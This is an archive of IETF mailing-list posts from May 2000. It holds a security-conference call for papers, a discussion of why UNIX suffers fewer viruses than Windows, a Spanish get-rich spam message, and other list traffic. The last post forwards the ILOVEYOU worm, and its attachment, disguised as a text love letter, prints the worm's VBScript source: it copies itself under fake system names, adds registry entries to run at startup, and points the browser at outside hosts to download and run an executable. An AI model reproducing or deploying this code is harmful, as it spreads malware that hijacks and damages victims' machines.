From: "David M. Balenson" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: CFP: ISOC Netw & Distr Sys Security Symp (NDSS'01)
X-Loop: [EMAIL PROTECTED]
C A L L F O R P A P E R S
The Internet Society
2001 Network and Distributed System Security Symposium
(NDSS'01)
February 7-9, 2001
Catamaran Resort, San Diego, California
IMPORTANT DATES
Paper Submission due: August 2, 2000
Author Notification: September 27, 2000
Camera-ready final papers due: October 31, 2000
GOAL:
This symposium will foster information exchange among researchers
and practioners of network and distributed system security
services. The intended audience includes those who are interested
in the practical aspects of network and distributed system security,
focusing on actual system design and implementation, rather than
theory. A major goal of the symposium is to encourage and enable
the Internet community to apply, deploy, and advance the state of
available security technology. The proceedings of the symposium
will be published by the Internet Society.
Submissions are solicited for, but are not limited to, the following
topics:
* Secure Electronic Commerce: e.g., payment, barter, EDI,
notarization/timestamping, endorsement and licensing.
* Intellectual Property Protection: protocols, schemas,
implementations, metering, watermarking, other forms of rights
management.
* Implementation, deployment and management of network security
policies.
* Integrating Security in Internet protocols: routing, naming,
TCP/IP, multicast, network management, and the Web.
* Attack-resistant protocols and services.
* Special problems and case studies: e.g., interplay and tradeoffs
between security and efficiency, usability, reliability and cost.
* Security for collaborative applications and services: tele- and
video-conferencing, groupwork, etc.
* Fundamental services: authentication, data integrity,
confidentiality, authorization, non-repudiation, and availability.
* Supporting mechanisms and APIs: key management and certification,
revocation, audit trails and accountability.
* Public Key Infrastructure.
* Integrating security services with system and application security
facilities and protocols: e.g., message handling, file
transport/access, directories, time synchronization, database
management, boot services, mobile computing.
* Security for emerging technologies: sensor networks, specialized
testbeds, wireless/mobile (and ad hoc) networks, personal
communication systems, and large heterogeneous distributed systems.
* Intrusion Avoidance, Detection, and Response: systems, experiences
and architectures.
* Network Perimeter Controls: firewalls, packet filters, application
gateways.
* Virtual Private Networks.
BEST PAPER AWARD:
There will be a best paper award again this year. The award will
be presented at the symposium to the authors of the best overall
paper as selected by the Program Committee.
SUBMISSIONS:
The Program Committee invites both technical papers and panel
proposals. Technical papers should be at most 20 pages long. Panel
proposals should be at most two pages and should describe the
topic, identify the panel chair, explain the format of the panel,
and list three to four potential panelists. Technical papers will
appear in the proceedings. A description of each panel will appear
in the proceedings, and may - at the discretion of the panel chair
- include written position statements from the panelists.
Each submission must contain a separate title page with the type
of submission (paper or panel), the title or topic, the names of
the author(s), organizational affiliation(s), telephone and FAX
numbers, postal addresses, e-mail addresses, and must specify the
contact author in case of multi-author submissions. The names of
authors, affiliations, and other identifying information should
appear only on the separate title page. Submissions must be
received by August 2, 2000, and must be made via electronically
in either PostScript or ASCII format. If the Committee is unable
to print a PostScript submission, a hardcopy will be requested.
Therefore, PostScript submissions must arrive well before the
deadline.
Submission information can be found at
http://www.isoc.org/ndss01/cfp. Dates, final call for papers,
advance program, and registration information will be available
soon at http://www.isoc.org/ndss01.
Each submission will be acknowledged by e-mail. If acknowledgment
is not received within seven days, please contact the program
Co-chairs as indicated below. Authors and panelists will be
notified of acceptance by September 27, 2000. Instructions for
preparing camera-ready copy for the proceedings will be sent at
that time. The camera-ready copy must be received by October 31,
2000.
GENERAL CHAIR:
Stephen Welke, Trusted Computer Solutions
PROGRAM CO-CHAIRS:
Avi Rubin, AT&T Labs - Research
Paul Van Oorschot, Entrust Technologies
TUTORIAL CHAIR:
Eric Harder, National Security Agency
LOCAL ARRANGEMENTS CHAIR:
Thomas Hutton, San Diego Supercomputer Center
PUBLICATIONS CHAIR:
Mahesh Tripunitara, Purdue University
PUBLICITY CHAIR:
David Balenson, NAI Labs, Network Associates
LOGISTICS CHAIR:
Carla Rosenfeld, Internet Society
PROGRAM COMMITTEE:
Bennet Yee, University of California San Diego
Bill Cheswick, Bell Labs
Dave Kormann, AT&T Labs - Research
David Aucksmith, Intel Corportation
David P. Maher, Intertrust
David Wagner, UC Berkeley
Edward W. Felten, Princeton University
Fabian Monrose, Bell Labs
Gary McGraw, Reliable Software Technologies
James Ellis, Sun Microsystems
Kevin McCurley, IBM Almaden Research Center
Matt Bishop, UC Davis
Mudge, L0pht Heavy Industries, Inc.
Peter Gutmann, University of Auckland, New Zealand
Radia Perlman, Sun Microsystems
Sandra Murphy, Network Associates
Tom Berson, Anagram Laboratories
Virgil D. Gligor, University of Maryland
>From owner-ietf-outbound Fri May 5 15:50:30 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAB27698
for [EMAIL PROTECTED]; Fri, 5 May 2000 15:50:02 -0400 (EDT)
Received: from motgate.mot.com (motgate.mot.com [129.188.136.100])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA27440
for <[EMAIL PROTECTED]>; Fri, 5 May 2000 15:40:37 -0400 (EDT)
Received: [from pobox2.mot.com (pobox2.mot.com [136.182.15.8]) by motgate.mot.com
(motgate 2.1) with ESMTP id MAA07196; Fri, 5 May 2000 12:40:27 -0700 (MST)]
Received: [from relay1.cig.mot.com (relay1.cig.mot.com [136.182.15.23]) by
pobox2.mot.com (MOT-pobox2 2.0) with ESMTP id MAA24186; Fri, 5 May 2000 12:40:27 -0700
(MST)]
Received: from email.mot.com (t_il06_r_port10.corp.mot.com [129.188.171.31]) by
relay1.cig.mot.com (8.8.8+Sun/SCERG-RELAY-1.11b) with ESMTP id OAA13331; Fri, 5 May
2000 14:01:42 -0500 (CDT)
Sender: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Date: Fri, 05 May 2000 20:04:33 +0000
From: Randall Stewart <[EMAIL PROTECTED]>
Organization: NAT
X-Mailer: Mozilla 4.7 [en] (X11; U; Linux 2.2.12-20 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: "Michael H. Warfield" <[EMAIL PROTECTED]>
CC: [EMAIL PROTECTED], Scot Mc Pherson <[EMAIL PROTECTED]>,
[EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
References: <00e101bfb5db$13959a60$[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Michael:
I could not agree more, we have a few (possibly .. 3) virus that have
infect *nix systems. Even more telling, look at how linux systems
have NOT been infected or bothered much. I find this interesting
since the code - bugs, wart, and any holes are available to any
who want to look at it...
Now if I take and switch the machine I am typing on over to
that "other" o/s the virus scanner it has lists 100's and I
mean 100's of viruses...
I do understand that some of us are STUCK with that other
O/S... but there are options.. I too am in theory using it.. but
only when I have to... I do all my real work on the linux side and
only occasionaly fire up the other side to read a awful .doc or .ppt
file...
I simply refuse to allow our IT dept to have there way with me and
infect me with the worst virus... that other O/S :-)
R
"Michael H. Warfield" wrote:
>
> On Thu, May 04, 2000 at 11:13:03PM -0400, [EMAIL PROTECTED] wrote:
> > On Thu, 04 May 2000 11:11:50 EDT, Scot Mc Pherson <[EMAIL PROTECTED]>
>said:
> > > In fact to back up your statement, there are exactly 3 virii that infect
> > > UNIX based systems.
>
> > Hmm.. the Morris worm of 1988. What are the other 2?
>
> Bliss? Wasn't very sophisticated and it didn't propagate very
> well, but it did work. It just fizzeled out because it's propagation
> coefficient never even came close to break even.
>
> What's the other one?
>
> > Hmm.. if you count the 2 self-reproducing sample programs that
> > came with 'gcc', no others. Or maybe there's more than 3, which
> > is likely since I've seen at least 4 different "proof of concept"
> > level creations...
>
> I've seen some assembly code someone was proposing on one of the
> development lists. One of the DOS virus writers claiming that it would
> work as a Linux virus. No evidence that it does anything though. I
> would marginally call that one a "proof of concept" or a "maybe of
> concept".
>
> > Valdis Kletnieks
> > Operating Systems Analyst
> > Virginia Tech
>
> Mike
> --
> Michael H. Warfield | (770) 985-6132 | [EMAIL PROTECTED]
> (The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/
> NIC whois: MHW9 | An optimist believes we live in the best of all
> PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it!
--
Randall R. Stewart
Member Technical Staff
Network Architecture and Technology (NAT)
847-632-7438 fax:847-632-6733
>From owner-ietf-outbound Fri May 5 18:01:33 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA29776
for [EMAIL PROTECTED]; Fri, 5 May 2000 18:00:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA29746
for <[EMAIL PROTECTED]>; Fri, 5 May 2000 17:59:52 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id RAA03624;
Fri, 5 May 2000 17:59:34 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: Randall Stewart <[EMAIL PROTECTED]>
cc: "Michael H. Warfield" <[EMAIL PROTECTED]>, [EMAIL PROTECTED],
Scot Mc Pherson <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: viruses on UNIX vs. Windows
X-Subject-Was: Re: VIRUS WARNING
In-reply-to: Your message of "Fri, 05 May 2000 20:04:33 -0000."
<[EMAIL PROTECTED]>
Date: Fri, 05 May 2000 17:59:33 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
it might be useful to further examine the differences between UNIX-like
systems (including Linux) and Windows systems regarding their
susceptibility to viruses.
1. it should first be noted that UNIX-like systems are not immune to
worms or viruses. the Morris worm propagated itself via buffer
overflow bugs in sendmail and finger, and similar vulnerabilities are
probably still available to a would-be attacker. over the years many
more security holes like these have been found in UNIX systems and
exploited. we'll keep seeing such holes as long as people write
servers in C. but for some reason such attacks tend not to be viruses,
we just haven't seen many worms/viruses use these techniques since the
Morris worm.
2. the Morris worm worked with both vax and sun3 platforms presumably
because these were the most popular platforms then in use on the
Internet. today most viruses target Windows boxes presumably because
they are so popular.
3. the attacks that have been successful against UNIX tend to be specific
to a particular platform - its CPU instruction set, memory layout,
system traps, and library routines. Windows boxes are also vulnerable
to hardware-specific attacks, but they also support things like vbscript.
so there are multiple languages by which one can attack a windows box,
and many of those are commonly bundled with Windows. so in addition
to windows being more popular, in some ways you it has a more
predictable target environment (i.e. a given windows box is likely to
have more facilities you can exploit than a UNIX box) this makes Windows
a more predictable platform for software developers, but virus writers
are software developers too.
4. email-borne viruses have somewhat greater ability to penetrate
private networks because email tends to not be filtered by firewalls
(and even firewalls that scan for viruses generally are limited to
scanning for known viruses)
UNIX-based email clients are less vulnerable than their Windows
counterparts because
a) UNIX-like systems do not come with an extensive registry of content-type
-to- program mappings. nor, in general, do mail readers for these
platforms. so if a mail reader receives an object with an unusual
content-type it is unlikely to know what to do with it (other than
to offer to save it to a file)
b) UNIX based mail readers tend to rely on the MIME content-type
label and are less likely than Windows readers to "guess" how to
handle a file based on the file name suffix. MIME content-type
registrations are required to contain a security considerations
section. it may be that as a result, the content-type registry
on a UNIX system is less likely to contain definitions for
dangerous objects, than on a windows system...and therefore
UNIX mail readers are less likely to try to interpret such things.
c) UNIX systems have fewer interpreters for content-types that
can cause harmful side-effects, and such as do exist (such
as PostScript) are more likely to be invoked in a "safe" mode.
script attacks are certainly possible on UNIX - most UNIX systems
support script languages with destructive power similar to vbscript.
but it is very unlikely that a UNIX mail reader would be configured
to, say, automatically execute a perl script received in mail.
d) UNIX has not traditionally had a point-and-click interface,
so the notion that there is some action implicitly associated
with a file type, so common in the Windows and Mac worlds,
does not hold for UNIX. Indeed, UNIX has much the opposite
notion - that arbitrary tools can be applied to arbitrary files.
5. unlike many Windows-ish boxes, UNIX is a multi user operating
system with file protections. thus there is a layer of isolation
between user processes and the operating system, which limits the
degree of damage that is likely to happen. to be sure, a lot of
harm can be done by trashing or altering a single user's files,
and there may are often security holes which can be exploited
to elevate an ordinary user's privileges. but this is still an
additional barrier that must be overcome. Windows is an easier
target.
6. there is a great deal more history with security exploits,
and thus with countermeasures, on UNIX-like systems.
there seems to be greater awareness of the potential for harm
among the UNIX community than among Windows developers.
this may be because UNIX is primarily used by computer experts.
conclusion:
to some degree Windows is inherently more vulnerable because it
is a more popular platform. however it should be possible to make
Windows much less vulnerable than it currently is merely by a few
countermeasures.
- don't automatically evaluate content unless it is KNOWN to be safe
from harmful side-effects. either that or evaluate the content
only within a sandbox which prevents such harm. (this means
that you limit the content that you're willing to automatically
evaluate to a few well-understood types)
- don't offer to execute content that can cause harm unless
(a) the recipient okays it, (b) the sender's identity is
known and the integrity of the file can be assured
(via verifiable digital signatures), and (c) the recipient
is warned *each time* that the content can cause harm.
Keith
>From owner-ietf-outbound Fri May 5 18:11:30 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA00074
for [EMAIL PROTECTED]; Fri, 5 May 2000 18:10:03 -0400 (EDT)
Received: from papaya.AESOP (root@[209.189.115.49])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA00027
for <[EMAIL PROTECTED]>; Fri, 5 May 2000 18:08:17 -0400 (EDT)
Received: from [193.153.11.190] ([193.153.11.190]:44554 "HELO your email address"
ident: "NO-IDENT-SERVICE") by papaya.AESOP with SMTP id <270391-19720>; Fri, 5 May
2000 14:35:28 -0700
From: [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: GANA DINERO CASI DE IMMEDIATO
Message-Id: <[EMAIL PROTECTED]>
Date: Fri, 5 May 2000 14:35:28 -0700
X-Loop: [EMAIL PROTECTED]
Hola,
Puede que usted sea una persona que le interesan las oportunidades;
si estoy en un error, por favor una disculpa.
Gane de $40-100 USD diarios. Resultados en 24 horas!!
Utilice nuestro Sistema Automatizado de Promocion. Es muy facil.
Solicite informes enviando un email en blanco al visitar nuestra pagina en:
http://ebiz.paklinks.com/
http://go.quick.to/ebiz/
http://nikkei.st/to/ebiz/
http://www.ir-a.net/ebiz
Si encuentra que algunos de estos links no funciona, visite el siguiente. Se agradece
informe del
fallo
O envie un email a:
<mailto:[EMAIL PROTECTED]?subject=informacion>
Gracias por su atencion
-----------------------------------------------------------------------------------------------------------------------------------------
Puede borrarse de la lista en cualquiera de las direcciones ofrecidas. No obstante
este email
solo lo recibira esta vez desde esta direccion por lo que no es necesario darse de
baja.
Por otro lado el envio de este email es legal desde el punto de vista de las leyes
españolas.
___________________________________________________________
>From owner-ietf-outbound Fri May 5 20:41:31 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA01776
for [EMAIL PROTECTED]; Fri, 5 May 2000 20:40:02 -0400 (EDT)
Received: from zeus.bresnanlink.net (mail.bresnanlink.net [24.213.60.74])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA01744
for <[EMAIL PROTECTED]>; Fri, 5 May 2000 20:39:09 -0400 (EDT)
Received: from acm.org ([204.73.160.88]) by zeus.bresnanlink.net
(Post.Office MTA v3.5.3 release 223 ID# 0-67047U15200L1520S0V35)
with ESMTP id net for <[EMAIL PROTECTED]>;
Fri, 5 May 2000 20:34:21 -0400
Sender: blk
Message-ID: <[EMAIL PROTECTED]>
Date: Sat, 06 May 2000 00:38:29 +0000
From: Brant Knudson <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.5 [en] (X11; U; Linux 2.2.12 i586)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
I think I'm starting to see a pattern emerging in email viruses.
Melissa: Uses script to read user's address book to get the email
addresses of new victims.
ILOVEYOU: Uses script to read user's address book to get the email
addresses of new victims.
What method do you think the next email virus is going to use if
Microsoft doesn't stop scripts from reading people's address books? Why
didn't MS plug this hole after Melissa?
Brant
I actually laughed when I saw these lines:
> rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
> Host\Settings\Timeout")
> if (rr>=1) then
> wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
> Host\Settings\Timeout",0,"REG_DWORD"
> end if
Pretty blatant security problem, being able to set the timeout for the
running script so it can take all the time it wants. (Besides being
able to write to the registry, etc.)
>From owner-ietf-outbound Fri May 5 21:31:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id VAA02274
for [EMAIL PROTECTED]; Fri, 5 May 2000 21:30:03 -0400 (EDT)
Received: from mail-green.research.att.com (H-135-207-30-103.research.att.com
[135.207.30.103])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id VAA02238
for <[EMAIL PROTECTED]>; Fri, 5 May 2000 21:26:03 -0400 (EDT)
Received: from postal.research.att.com (postal.research.att.com [135.207.23.30])
by mail-green.research.att.com (Postfix) with ESMTP
id EA31D1E037; Fri, 5 May 2000 21:26:04 -0400 (EDT)
Received: from smb.research.att.com (postal.research.att.com [135.207.23.30])
by postal.research.att.com (8.8.7/8.8.7) with ESMTP id VAA19953;
Fri, 5 May 2000 21:26:04 -0400 (EDT)
Received: from smb.research.att.com (localhost.research.att.com [127.0.0.1])
by smb.research.att.com (Postfix) with ESMTP
id 211C835DC2; Fri, 5 May 2000 21:25:58 -0400 (EDT)
X-Mailer: exmh version 2.1.1 10/15/1999
From: "Steven M. Bellovin" <[EMAIL PROTECTED]>
To: Brant Knudson <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 05 May 2000 21:25:57 -0400
Sender: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <[EMAIL PROTECTED]>, Brant Knudson writes:
>
>I think I'm starting to see a pattern emerging in email viruses.
>
>Melissa: Uses script to read user's address book to get the email
>addresses of new victims.
>ILOVEYOU: Uses script to read user's address book to get the email
>addresses of new victims.
>
>What method do you think the next email virus is going to use if
>Microsoft doesn't stop scripts from reading people's address books? Why
>didn't MS plug this hole after Melissa?
Hardly new -- the IBM Christmas Card Virus, in 1987 (yes, before the Morris
Worm) used the exact same technique.
--Steve Bellovin
>From owner-ietf-outbound Fri May 5 22:50:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id WAA04984
for [EMAIL PROTECTED]; Fri, 5 May 2000 22:50:02 -0400 (EDT)
Received: from mail2.microsoft.com (mail2.microsoft.com [131.107.3.124])
by ietf.org (8.9.1a/8.9.1a) with SMTP id WAA04961
for <[EMAIL PROTECTED]>; Fri, 5 May 2000 22:48:12 -0400 (EDT)
Received: from 157.54.9.104 by mail2.microsoft.com (InterScan E-Mail VirusWall NT);
Fri, 05 May 2000 15:05:31 -0700 (Pacific Daylight Time)
Received: by INET-IMC-02 with Internet Mail Service (5.5.2651.58)
id <KJG5MAXM>; Fri, 5 May 2000 15:05:31 -0700
Message-ID: <D5922CA42F8CD31189D800805F19A16C04B7B29D@RED-MSG-48>
From: Ian King <[EMAIL PROTECTED]>
To: "'Randall Stewart'" <[EMAIL PROTECTED]>,
"Michael H. Warfield"
<[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED], Scot Mc Pherson <[EMAIL PROTECTED]>,
[EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
Date: Fri, 5 May 2000 15:05:21 -0700
X-Mailer: Internet Mail Service (5.5.2651.58)
X-Loop: [EMAIL PROTECTED]
The goal of those who write viruses is to get attention, true? I guess they
figure that writing their viruses for Windows is going to get them a lot
more attention than writing for other operating systems with smaller user
bases. :-)
Tongue firmly in cheek -- Ian King
----------
DISCLAIMER: The foregoing is my personal opinion, and should not be
construed as the official position of or statement by my employer.
-----Original Message-----
From: Randall Stewart [mailto:[EMAIL PROTECTED]]
Sent: Friday, May 05, 2000 1:05 PM
To: Michael H. Warfield
Cc: [EMAIL PROTECTED]; Scot Mc Pherson; [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
Michael:
I could not agree more, we have a few (possibly .. 3) virus that have
infect *nix systems. Even more telling, look at how linux systems
have NOT been infected or bothered much. I find this interesting
since the code - bugs, wart, and any holes are available to any
who want to look at it...
Now if I take and switch the machine I am typing on over to
that "other" o/s the virus scanner it has lists 100's and I
mean 100's of viruses...
I do understand that some of us are STUCK with that other
O/S... but there are options.. I too am in theory using it.. but
only when I have to... I do all my real work on the linux side and
only occasionaly fire up the other side to read a awful .doc or .ppt
file...
I simply refuse to allow our IT dept to have there way with me and
infect me with the worst virus... that other O/S :-)
R
[snip]
>From owner-ietf-outbound Fri May 5 23:40:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id XAA05729
for [EMAIL PROTECTED]; Fri, 5 May 2000 23:40:03 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id XAA05691
for <[EMAIL PROTECTED]>; Fri, 5 May 2000 23:35:25 -0400 (EDT)
Received: (from bovik@localhost)
by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id UAA25596;
Fri, 5 May 2000 20:35:09 -0700 (PDT)
Date: Fri, 5 May 2000 20:35:09 -0700 (PDT)
From: "James P. Salsman" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: device upload update
X-Loop: [EMAIL PROTECTED]
The device upload petition at:
http://www.bovik.org/devup-petition
Has been updated with a message from Tim Berners-Lee:
http://www.bovik.org/devup-petition/tbl-devup.txt
For the record, I fully support device upload without the DEVICE
attribute. It is so much better than nothing that the incremental
benefits of my device upload proposal are no more than miniscule
by comparison.
Evidently, the California Attorney General was gracious enough to
voice these concerns during some of the recent antitrust remedy
conferences. A lot of people sent Dr. Berners-Lee's comments in
to the A.G., for which they deserve our thanks. However, Microsoft
has been objecting that some things in the proposed remedy were not
raised at trial. I doubt that late evidence will have much effect
on what the judge can order pending appeal, but I hope anyone
reading this with any influence in the matter will do what needs
to be done to keep Microsoft from their strangle-hold on audio
upload plug-ins. If MSIE were to implement microphone upload, as
described by the Director of the W3C, I have no doubt that the
other browser manufacturers would quickly follow.
The project to add the feature to Mozilla:
http://www.sourcexchange.com/WishDetail?wishID=227
is progressing slowly due in part to the effects of the Gecko
re-write. I invite anyone to take a crack at it. Relevant code
excerpts are available from SourceXchange by clicking on the
"View Comments" button from the link above. And of course all
the current annotated source code is available from www.mozilla.org.
Cheers,
James
>From owner-ietf-outbound Sat May 6 04:10:31 2000
Received: by ietf.org (8.9.1a/8.9.1a) id EAA19041
for [EMAIL PROTECTED]; Sat, 6 May 2000 04:10:01 -0400 (EDT)
Received: from necom830.hpcl.titech.ac.jp (necom830.hpcl.titech.ac.jp [131.112.32.132])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id EAA19012
for <[EMAIL PROTECTED]>; Sat, 6 May 2000 04:06:26 -0400 (EDT)
From: Masataka Ohta <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Received: by necom830.hpcl.titech.ac.jp (8.6.11/TM2.1)
id QAA02377; Sat, 6 May 2000 16:59:16 +0900
Subject: Re: draft-ietf-nat-protocol-complications-02.txt
In-Reply-To: <v04220804b52a1d69f905@[10.19.130.188]> from Steve Deering at "Apr
24, 2000 09:42:06 am"
To: Steve Deering <[EMAIL PROTECTED]>
Date: Sat, 6 May 2000 16:59:15 +0859 ()
CC: Sean Doran <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED]
X-Mailer: ELM [version 2.4ME+ PL68 (25)]
X-Loop: [EMAIL PROTECTED]
Steve Deering;
> >Unfortunately, IPv6's current addressing architecture makes it very
> >difficult to do this sort of traditional multihoming if one is not
> >IPv6's larger address space is merely a necessary piece of an
> >Internet which will not run out of numbers.
>
> Wow, we actually agree on something! (Though I could quibble over the
> "merely".)
As you two seemingly have agreed, IPv6, as is, is not so useful
for scalable multihoming.
However, transition to IPv6 is important to solve multihoming
issues, because IPv6 routing space is not yet polluted by
unaggregated addresses.
Important pieces are documented in
<draft-ohta-e2e-multihoming-00.txt>
The Architecture of End to End Multihoming
just become available.
Masataka Ohta
>From owner-ietf-outbound Sun May 7 02:22:48 2000
Received: by ietf.org (8.9.1a/8.9.1a) id CAA10659
for [EMAIL PROTECTED]; Sun, 7 May 2000 02:21:40 -0400 (EDT)
Received: from mailgw1.netvision.net.il (mailgw1.netvision.net.il [194.90.1.14])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id CAA08706
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 02:07:11 -0400 (EDT)
Received: from ismailout.icomverse.com (Efrat-FR3.ser.netvision.net.il
[199.203.174.65])
by mailgw1.netvision.net.il (8.9.3/8.9.3) with ESMTP id JAA16869
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 09:06:18 +0300 (IDT)
Received: from ismail1.icomverse.com (ismail1.icomverse.com [190.190.110.2])
by ismailout.icomverse.com (8.10.1/8.10.1) with ESMTP id e4773gH21222
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 10:03:42 +0300
Received: by ismail1.icomverse.com with Internet Mail Service (5.5.2650.21)
id <KJ1C1BD9>; Sun, 7 May 2000 09:04:55 +0300
Message-ID: <[EMAIL PROTECTED]>
From: "Gazal, Elly" <[EMAIL PROTECTED]>
To: IETF <[EMAIL PROTECTED]>
Subject: ILOVEYOU
Date: Sun, 7 May 2000 09:04:39 +0300
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: multipart/mixed;
boundary="----_=_NextPart_000_01BFB7EA.29D9DDFC"
X-Loop: [EMAIL PROTECTED]
This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.
------_=_NextPart_000_01BFB7EA.29D9DDFC
Content-Type: text/plain
kindly check the attached LOVELETTER coming from me.
------_=_NextPart_000_01BFB7EA.29D9DDFC
Content-Type: application/octet-stream;
name="LOVE-LETTER-FOR-YOU.TXT.vbs"
Content-Disposition: attachment;
filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
Content-Transfer-Encoding: quoted-printable
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / [EMAIL PROTECTED] / @GRAMMERSoft Group / =
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=3D""
ctr=3D0
Set fso =3D CreateObject("Scripting.FileSystemObject")
set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=3Dfile.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=3DCreateObject("WScript.Shell")
rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
Scripting Host\Settings\Timeout")
if (rr>=3D1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin =3D fso.GetSpecialFolder(0)
Set dirsystem =3D fso.GetSpecialFolder(1)
Set dirtemp =3D fso.GetSpecialFolder(2)
Set c =3D fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern=
el32",dirsystem&"\MSKernel32.vbs"
regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService=
s\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=3D""
downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
Explorer\Download Directory")
if (downread=3D"") then
downread=3D"c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
Randomize
num =3D Int((4 * Rnd) + 1)
if num =3D 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm=
hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num =3D 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw=
erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num =3D 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd=
QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num =3D 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD=
GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN=
-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then
regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU=
GSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet =
Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
